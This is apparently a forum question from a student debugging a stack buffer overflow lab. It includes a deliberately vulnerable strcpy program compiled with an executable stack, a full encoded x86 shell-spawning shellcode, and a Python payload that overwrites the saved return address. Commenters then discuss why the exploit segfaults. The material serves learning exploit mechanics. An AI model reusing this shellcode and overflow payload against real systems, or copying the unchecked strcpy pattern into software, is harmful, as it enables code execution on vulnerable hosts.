# Shellcode Segfault - testcase vs strcpy

Tags: c, security, buffer-overflow, shellcode

So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a char array and the user not adding the -fno-stack-protector / -z execstack flags for gcc. I've tried turning off ASLR (though I'm unsure if it's relevant?), there is no stack canary or anything involved. I'm using a cyclic offset generator to find the stack offset and using gdb to find the start of the buffer (so I know I have the correct return address). Everything is in gdb so I'm aware there will be an address difference when running outside of gdb, I originally had a NOP sled but removed it to reduce complexity.

So I've reached my wits end... I feel like it might be something at the assembly layer that I'm not understanding/haven't learned. Might be something silly....

First I have a test-case program that just takes the shellcode as a commandline argument which successfully pops the shell:

> Compiled with: gcc -m32 -z execstack file.c -o file

```
#include<stdio.h>
#include<string.h>

int main(int argc, char *argv[])
{
        unsigned char shellcode[100];
        strcpy(shellcode,argv[1]);

        int (*ret)() = (int(*)())shellcode;
        ret();
}
```

> root@kali:~/tmp# ./test2 $(python -c 'print
>   "\xbf\xa0\xbc\xdf\x9c\xda\xda\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0c\x31\x78\x13\x03\x78\x13\x83\xe8\x5c\x5e\x2a\xf6\x97\xc7\x4c\x55\xc1\x9f\x43\x39\x84\x87\xf4\x92\xe5\x2f\x05\x85\x26\xd2\x6c\x3b\xb1\xf1\x3d\x2b\xcb\xf5\xc1\xab\xe4\x97\xa8\xc5\xd5\x35\x4a\x69\x41\xba\xdb\xde\x18\x5b\x2e\x60"')
>
> root@kali:/root/tmp# <-- **New shell popped**

---

Next I wanted to try to actually overflow a buffer to overwrite the stored EIP address and run the shellcode, this case continually results in a segfault...

> Compiled with: gcc -m32 -z execstack file.c -o file

```
#include<stdio.h>
#include<string.h>


void login_success(char *password)
{
        char pass[60];
        strcpy(pass, password);
}

int main(int argc, char *argv[])
{
        login_success(argv[1]);
}
```

the offset to eip is 72 bytes, my shellcode is 72 bytes long + adding the eip overwrite.

Shellcode looks like:

```
buf =  ""

buf += "\xbf\xa0\xbc\xdf\x9c\xda\xda\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0c\x31\x78\x13\x03\x78\x13\x83\xe8\x5c\x5e\x2a\xf6\x97\xc7\x4c\x55\xc1\x9f\x43\x39\x84\x87\xf4\x92\xe5\x2f\x05\x85\x26\xd2\x6c\x3b\xb1\xf1\x3d\x2b\xcb\xf5\xc1\xab\xe4\x97\xa8\xc5\xd5\x35\x4a\x69\x41\xba\xdb\xde\x18\x5b\x2e\x60"

#0xffffd264
buf += "\x64\xd2\xff\xff"
print buf
```

Running this results in a segmentation fault...

If I step through gdb they both reach the shellcode, I've followed every step and it all their commands are the same up until it has to make a call instruction.

In the images below the strcpy instance is on the left, the test-case is on the right:

[image: Shellcode is the same up until call]

[image: Shellcode deviates]

I'm not sure if it has to do with the ret instruction from the previous stackframe where the overflow occured? I can provide any additional information if needed. Any information about what I should research further would be appreciated!

Comment: Those don't look "the same"... You also haven't shown the instruction that gets `call`ed.

Comment: The first screenshot shows the last 4 commands being the same before the call (rather than showing the 50 other steps they match...), the 2nd screenshot shows the command EIP points to after the call where the code deviates. In the left pane after running "das" it seg faults on the bound command

Comment: I mean how the first screenshot shows `bound ... [eax]` and the second shows `bound ... [ecx+0x73]` as the last instruction shown. Those are different. They are not the same.

Comment: Well considering the call function is an unconditional jump past those bound calls that you see Im not sure why thats relevant? That area of memory to my knowledge isnt executed, so the deviation begins at the call instruction. If you run a diff on the shellcode I place in the python script and the shellcode I put in the commandline for the testcase they are the same.

Comment: Well the call instructions are different as well.

Comment: Because they are different programs so their memory allocation and structure are different.... it looks like it goes for an offset that is near the shellcode itself. Have you ever worked with C or assembly...?